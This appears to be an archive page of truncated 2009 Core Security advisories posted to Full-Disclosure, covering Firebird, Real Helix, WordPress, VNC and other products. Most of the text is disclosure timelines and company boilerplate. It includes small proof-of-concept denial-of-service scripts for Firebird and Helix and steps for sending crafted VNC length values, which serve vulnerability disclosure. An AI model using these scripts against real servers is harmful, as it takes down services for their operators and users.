2009-08-18 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2009-0707: Firebird SQL op_connect_request main listener shutdown vulnerability

2009-07-28 Thread CORE Security Technologies Advisories
    t))
    print "(+) Sending op_connect_request packet..."
    s.send(str(packet))
    s.close()
    print "(+) op_connect_request packet successfully sent."

    # Wait 10 seconds and try to connect again to the Firebird SQL server,
    # to check if it's down
    print "(+) Waiting 10 seconds before trying to reconnect to the server..."
    time.sleep(10)

    try:
        print "(+) Trying to reconnect..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print "(!) Something went wrong. The server is still alive."
    except socket.error:
        print "(*) Attack successful. The server is down."


port = 3050
host = '192.168.131.128'  # Replace with your target host
attack(host, port)

- ---/



9. *Report Timeline*

. 2009-07-15:
Core Security Technologies notifies the Firebird team of the vulnerability.

. 2009-07-16:
Firebird team requests technical details in plaintext.

. 2009-07-16:
Core sends the advisory draft, including technical details.

. 2009-07-20:
Firebird team notifies that the issue is resolved in all branches of the
Firebird repository [2]. Technical details will be made publicly visible
when Core releases its advisory. The Firebird team notes that Firebird
version 1.5.5 (marked as non-vulnerable in the advisory draft) seems to
be affected.

. 2009-07-27:
Core sends the final version of the advisory to the Firebird team.

. 2009-07-28:
The advisory CORE-2009-0707 is published.



10. *References*

[1] http://www.firebirdsql.org
[2] http://tracker.firebirdsql.org/browse/CORE-2563




[Full-disclosure] CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities

2009-07-17 Thread CORE Security Technologies Advisories
[<&MSVCR71.strchr>]
   ; MSVCR71.strchr

- ---/

 The following code reproduces the issue:

/---

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('172.16.132.133',554))

setRequest = "SETUP / RTSP/1.0\r\n\r\n"

s.send(setRequest)
s.close()

- ---/


9. *Report Timeline*

. 2009-03-04:
Core Security Technologies notifies RealNetworks of the vulnerability.
Core initially schedules publication of its advisory to April 6th, 2009.

. 2009-03-16:
Core notifies RealNetworks of the vulnerability again.

. 2009-03-16:
RealNetworks identifies the vulnerability alert as SPAM.

. 2009-03-20:
The RealNetworks team asks Core for a technical description of the
vulnerability.

. 2009-03-23:
Technical details sent to RealNetworks team by Core. RealNetworks
acknowledges reception.

. 2009-03-30:
Core requests information about the plans of RealNetworks to fix the
vulnerabilities.

. 2009-03-30:
RealNetworks responds that fixes will be included in the next public
release - currently targeted for July 2009.

. 2009-05-04:
Core requests from RealNetworks a technical analysis of the
vulnerabilities, a list of the affected versions of Helix Server, and a
detailed timeline for developing, testing and releasing fixes for these
vulnerabilities. Only with that information can Core reevaluate its
advisory publication timeframe (which was originally scheduled for
April 6).

. 2009-05-05:
RealNetworks responds that fixes will be available in mid-2009, most
likely in the July time frame, and that to protect its customer base
RealNetworks will not provide additional details until the release is
publicly available.

. 2009-05-05:
Core requests a more precise estimation for the release of fixes (no
reply received).

. 2009-05-29:
Core again asks RealNetworks for an estimated release date for the
fixes, and for technical details about the issues. In the meantime, the
publication of advisory CORE-2009-0227 is rescheduled for July 15th (no
reply received).

. 2009-07-16:
An updated version of the advisory is sent to RealNetworks by Core.
Core again requests information about this issue.

. 2009-07-17:
Core becomes aware that RealNetworks has released Security Update
071409HS [2] on July 14th, which states that version 13.0.0 of the Helix
Server and the Helix Mobile Server have been updated to ensure that the
above vulnerabilities have been resolved.

. 2009-07-17:
The advisory CORE-2009-0227 is published by Core.



10. *References*

[1] RealNetworks
http://www.realnetworks.com/
[2] RealNetworks Security Update 071409HS
http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf



[Full-disclosure] CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information

2009-07-08 Thread Core Security Technologies Advisories
 CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CORE-2009-0519 - Awingsoft Awakening Winds3D Viewer remote command execution vulnerability

2009-07-08 Thread CORE Security Technologies Advisories
quirements for information 
security technologies. We conduct our research in several important 
areas of computer security including system vulnerabilities, cyber 
attack planning and simulation, source code auditing, and cryptography. 
Our results include problem formalization, identification of 
vulnerabilities, novel solutions and prototypes for new technologies. 
CoreLabs regularly publishes security advisories, technical papers, 
project information and shared software tools for public use at: 
http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help 
security-conscious organizations worldwide develop and maintain a 
proactive process for securing their networks. The company's flagship 
product, CORE IMPACT, is the most comprehensive product for performing 
enterprise security assurance testing. CORE IMPACT evaluates network, 
endpoint and end-user vulnerabilities and identifies what resources are 
exposed. It enables organizations to determine if current security 
investments are detecting and preventing attacks. Core Security 
Technologies augments its leading technology solution with world-class 
security consulting services, including penetration testing and software 
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core 
Security Technologies can be reached at 617-399-6980 or on the Web at 
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security 
Technologies and (c) 2009 CoreLabs, and may be distributed freely 
provided that no fee is charged for this distribution and proper credit 
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security 
Technologies advisories team, which is available for download at 
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass

2009-06-09 Thread CORE Security Technologies Advisories
nfirms that Protocol Lockdown is a feasible workaround. Details
will be included in the Security Research and Defense blog.

. 2009-06-09:
Final draft of the advisory sent to MSRC.

. 2009-06-09:
Core Security Advisory CORE-2008-0826 published.


10. *References*

[1] http://www.techzoom.net/publications/insecurity-iceberg/index.en
[2] http://msdn2.microsoft.com/en-us/library/ms537183.aspx
[3] http://blogs.technet.com/srd/archive/2009/06/09/cve-2009-1140-benefits-of-ie-protected-mode-additional-network-protocol-lockdown-workaround.aspx
[4] http://msdn.microsoft.com/en-us/library/ms775147(VS.85).aspx
[5] http://msdn.microsoft.com/en-us/library/ms775107(VS.85).aspx
[6] http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
[7] Internet Explorer 8.0 was officially released at this time, leaving the 'beta stage' - http://www.microsoft.com/windows/internet-explorer/default.aspx
[8] http://www.coresecurity.com/content/internet-explorer-zone-elevation
[9] Compatibility View KB968220 - http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=008753cc-2882-400c-a45d-587c870b8c0d and http://support.microsoft.com/?kbid=968220
[10] SPAD link - http://support.microsoft.com/kb/969058


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2009-0521 - DX Studio Player Firefox plug-in command injection

2009-06-09 Thread CORE Security Technologies Advisories
duct for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability

2009-06-02 Thread CORE Security Technologies Advisories
nated using the
vendor-sec mailing list [2].

. 2009-05-12:
Apple Product Security Team notifies Core they will contact vendor-sec
about this issue very soon and proposes to reschedule the advisory
publication date to June 2nd. The vendor also notifies the issue was
addressed in Mac OS X 10.5.7 by updating CUPS to version 1.3.10.

. 2009-05-13:
Apple Product Security Team notifies the suggested fix would be to
update to CUPS 1.3.10.

. 2009-05-15:
The Red Hat Security Response Team informs (via vendor-sec) that CUPS
1.1.17 is the oldest version they still ship and that it is affected as
well; earlier CUPS versions are probably affected too.

. 2009-05-25:
The Debian Team informs (via vendor-sec) there is a bug in the PoC
provided by Core. The advisory PoC is changed according to the comments
made by Debian Team.

. 2009-05-28:
Core notifies that the advisory is going to be released on June 2nd, and
requests a confirmation from Apple Security Team and vendor-sec
subscribers.

. 2009-05-29:
Apple Security Team, Red Hat Security Response Team and Debian Team
confirm the proposed release date. There was no request for embargo date
shift posted to vendor-sec.

. 2009-06-02:
The advisory CORE-2009-0420 is published.


10. *References*

[1] http://www.cups.org
[2] Vendor-sec, a mailing list dedicated to distributors of operating
systems using (but not necessarily solely comprised of) free and
open-source software - http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] CORE-2009-0401 - StoneTrip S3DPlayers remote command injection

2009-05-28 Thread CORE Security Technologies Advisories
n.

. 2009-05-07:
Core requests a status update for this vulnerability and
notifies its plan to publish the advisory on May 18th, 2009. No reply
received.

. 2009-05-15:
Core requests an answer to the previous mail. No reply
received.

. 2009-05-18:
Core Advisories Team does not release the advisory as
originally planned. Core re-schedules the advisory publication date to
26th May 2009.

. 2009-05-20:
Core notifies StoneTrip that the advisory publication date
was missed and that the last status requests were not answered. Core also
notifies the vendor of the final release date (26th May 2009).

. 2009-05-28:
After trying to contact the StoneTrip team several times
without success, the advisory CORE-2009-0401 is published as 'User
Release'.


10. *References*

[1] http://www.stonetrip.com
[2] ShiVa, a platform for 3D real-time development with a focus on game
development - http://www.stonetrip.com/shiva/shiva-3d-game-engine.html
[3] http://www.stonetrip.com/ston3d-players/ston3d-standalone.html
[4] http://www.stonetrip.com/ston3d-players/ston3d-webplayer.html
[5] http://stdn.stonetrip.com


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2009-0109 - Multiple XSS in Sun Communications Express

2009-05-20 Thread CORE Security Technologies Advisories
 fix for this
bug. The vendor will not be ready to go public with this fix tomorrow.

. 2009-05-05:
Core responds that it is possible to postpone the publication of the
advisory, but asks Sun engineering team for an estimated date to reach
the final release of the fix as soon as possible.

. 2009-05-08:
Sun engineering team informs that they are still experiencing some
delays in the final stages of this release process and asks to delay the
publication of the advisory.

. 2009-05-18:
Sun engineering team confirms that they have resolved the outstanding
issues related to this vulnerability and they expect to be ready to
publish the fixes on Wednesday 20th May.

. 2009-05-18:
Core re-schedules the advisory publication date to 20th May.

. 2009-05-20: The advisory CORE-2009-0109 is published.


10. *References*

[1] http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml
[2] HTML Code Injection and Cross-Site Scripting -
http://www.technicalinfo.net/papers/CSS.html
[3] The Cross-Site Scripting FAQ (XSS) -
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues -
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
[5] How to review ASP Code for CSSI Vulnerability -
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119
[6] How to review Visual InterDev Generated Code for CSSI Vulnerability -
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120
[7] HTTP Response Splitting vulnerability in Sun Delegated Administrator -
http://www.coresecurity.com/content/sun-delegated-administrator


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



Re: [Full-disclosure] [Advisories] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator

2009-04-22 Thread Core Security Technologies advisories
Sergio 'shadown' Alvarez wrote:
> Hi,
> 
> In the last CORE's advisories I've seen the following credits:
> 
>> 7. *Credits*
>>
>> This vulnerability was discovered by the SCS team [3] from Core  
>> Security
>> Technologies.
> 
> 
> Does this "SCS team"'s guy have a name ?
> Even in a football match 'the team' wins the match, but the GOALS are  
> made by somebody that deserves the credits.
> 
Yes, they have names and they did not want them to appear in the advisory.

Thank you for your continued interest in crediting vulnerability
discoverers for their findings and your insightful comments about sports.

-ivan




[Full-disclosure] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator

2009-04-21 Thread CORE Security Technologies Advisories
epaper_httpresponse.pdf.
[2] http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml
[3] Core Security Consulting Services -
http://www.coresecurity.com/content/services-overview-core-security-consulting-services
[4] Multiple vulnerabilities in Sun Calendar Express Web Server -
http://www.coresecurity.com/content/sun-calendar-express


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web Server

2009-03-31 Thread CORE Security Technologies Advisories
: The advisory CORE-2009-0108 is published.


9. *References*

[1] http://www.sun.com/software/products/calendar_srvr/
[2] HTML Code Injection and Cross-Site Scripting -
http://www.technicalinfo.net/papers/CSS.html
[3] The Cross-Site Scripting FAQ (XSS) -
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues -
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
[5] How to review ASP Code for CSSI Vulnerability -
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119
[6] How to review Visual InterDev Generated Code for CSSI Vulnerability -
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] CORE-2009-0122: HP OpenView Buffer Overflows

2009-03-23 Thread CORE Security Technologies Advisories
 within HP, and that they will publish their
security bulletin on March 24. Vendor asks Core not to publish the patch
location because that should be published on their security bulletin.
. 2009-03-17: Core re-schedules advisory CORE-2009-0122 publication to
March 24 and asks the vendor the URL of their security bulletin when
available.
. 2009-03-17: Core asks the vendor to reschedule publication to March
23, because March 24 is a working holiday in Argentina, where Core's
research and development center is located.
. 2009-03-17: Vendor confirms March 23 as the new publication date.
. 2009-03-23: Vendor publishes the hot fix.
. 2009-03-23: Core publishes advisory CORE-2009-0122.


9. *References*

[1] Secunia Research 07/01/2009
http://secunia.com/secunia_research/2008-13/
[2] HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow
http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar
[3] CVE-2008-0067
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
[4] HP advisory (HPSBMA02400 SSRT080144)
https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01646081
[5] HP security bulletin
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)

2009-03-09 Thread Core Security Technologies Advisories
009/03/remote-code-execution-in-pdf-still.html
[4] Authorization bypass
http://www.coresecurity.com/files/attachments/CORE-2009-0218-PoC-authorization-bypass.pdf
[5] Buffer overflow
http://www.coresecurity.com/files/attachments/CORE-2009-0218-PoC-BOF.pdf


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows

2009-02-03 Thread CORE Security Technologies Advisories
_socket->SendExact(str, strlen(str)))
364:return FALSE;
365:
366:return TRUE;
367: }
...

---/



Modifying line 360 so that a crafted length like 0x is sent triggers an
exception in the following functions:

   . In the case of UltraVNC, in 'ClientConnection::Authenticate()'
   . In the case of TightVNC, in 'ClientConnection::ReadFailureReason()'

To trigger the bug in the function 'ClientConnection::CheckBufferSize'
located in the file 'ClientConnection.cpp' (both vendors):

/---

(vncClient.cpp)

1848: void vncClient::UpdateClipText(LPSTR text)
1849: {
..
..
1858:   rfbServerCutTextMsg message;
1860:   message.length = Swap32IfLE(strlen(text));
1861:   if (!SendRFBMsg(rfbServerCutText, (BYTE *) &message, sizeof(message)))
1862:   {
1863:   Kill();
1864:   return;
1865:   }
1866:   if (!m_socket->SendQueued(text, strlen(text)))
1867:   {
1868:   Kill();
1869:   return;
1870:   }
1871: }
..

---/

In line 1860 the 'message.length' field must be set to some evil value
like 0x.
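As an added example (not the advisory's or either vendor's code), here is a bounds-checked viewer-side parse of the rfbServerCutText header whose 'message.length' field line 1860 fills in, modelling a 32-bit viewer; the policy cap, the function names and the constructed messages are this example's own:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* RFB ServerCutText: type(1) + padding(3) + length(4, big-endian), then
 * 'length' bytes of text. rfbServerCutText is message type 3. */
#define RFB_SERVER_CUT_TEXT     3
#define RFB_SERVER_CUT_TEXT_HDR 8
/* Policy cap on clipboard text a viewer will accept; an assumption of this
 * example, not a protocol or vendor constant. */
#define MAX_CUT_TEXT_LEN (1u << 20)

static uint32_t read_u32_be(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Hardened stand-in for a CheckBufferSize-style grow on a 32-bit viewer:
 * the buffer must hold the text plus a terminating NUL, and a length of
 * 0xFFFFFFFF wraps 'length + 1' to 0, which is exactly the kind of value
 * the advisory describes. Reject that, and anything over the cap. */
static bool cut_text_buffer_size(uint32_t length, uint32_t *needed)
{
    if (length > UINT32_MAX - 1)   /* length + 1 would wrap */
        return false;
    if (length > MAX_CUT_TEXT_LEN) /* policy limit */
        return false;
    *needed = length + 1;
    return true;
}

/* Validates a buffered ServerCutText header. Returns the buffer size the
 * viewer needs for the text, or -1 if the message is short, is not a
 * ServerCutText, or declares an unacceptable length. */
static long server_cut_text_needed(const uint8_t *msg, size_t avail)
{
    uint32_t needed;
    if (avail < RFB_SERVER_CUT_TEXT_HDR || msg[0] != RFB_SERVER_CUT_TEXT)
        return -1;
    if (!cut_text_buffer_size(read_u32_be(msg + 4), &needed))
        return -1;
    return (long)needed;
}

/* Constructed sample messages, not captured traffic. */
static const uint8_t kBenignCutText[] = {
    0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o'
};
static const uint8_t kWrappingCutText[] = {   /* length 0xFFFFFFFF */
    0x03, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF
};
static const uint8_t kOversizedCutText[] = {  /* length 0x00200000 */
    0x03, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00
};
```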


9. *Report Timeline*

. 2009-01-09:
Core notifies the TightVNC team of the vulnerability.

. 2009-01-09:
Core notifies the UltraVNC team of the vulnerability.

. 2009-01-10:
The UltraVNC team asks Core for a technical description of the
vulnerability.

. 2009-01-12:
Core notifies the TightVNC team of the vulnerability. The previous email
sent by Core was rejected by the vendor email service.

. 2009-01-12:
Technical details sent to UltraVNC team by Core.

. 2009-01-14:
The TightVNC team asks Core for a technical description of the
vulnerability.

. 2009-01-14:
Technical details sent to TightVNC team by Core.

. 2009-01-21:
TightVNC team notifies Core that a fix has been produced, but the
release of the fixed version (TightVNC 1.3.10) will be available early
February. TightVNC team releases the fix for its SVN users [5].

. 2009-01-26:
Core asks TightVNC if the fixed version will be available on
02-Feb-2009. No reply received.

. 2009-01-26:
Core asks UltraVNC team if a fixed version is available.

. 2009-01-26:
UltraVNC team notifies Core that a fixed version will probably be
available on Feb 1st 2009.

. 2009-01-30:
